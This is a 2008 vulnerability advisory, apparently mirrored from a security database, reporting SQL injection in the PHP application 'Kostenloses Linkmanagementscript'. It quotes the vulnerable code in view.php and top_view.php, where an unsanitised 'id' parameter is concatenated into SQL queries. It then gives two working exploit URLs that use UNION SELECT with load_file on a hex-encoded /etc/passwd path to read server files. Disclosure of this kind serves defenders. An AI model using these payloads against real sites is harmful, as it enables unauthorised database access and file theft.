Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19853
HistoryMay 15, 2008 - 12:00 a.m.

Kostenloses Linkmanagementscript SQL Injection Vulnerabilities

2008-05-1500:00:00
vulners.com
22

#######################################################################################

…::::Kostenloses Linkmanagementscript SQL Injection Vulnerabilities ::::…

#######################################################################################

Virangar Security Team

www.virangar.net


Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)

-------vuln codes in:-----------
top_view.php:
line 3:$id = $_GET['id'];


ine 19:$voting_page_command_sql = "SELECT votings, worth FROM ".$tab_links." WHERE id = '".$id."'";


view.php:
line 8:$id = $_GET['id'];
line 9:$view_page_command_sql = "SELECT url, hits FROM ".$tab_links." WHERE id = '".$id."'";

exploits:
http://site.com/[patch]/view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*
http://site.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*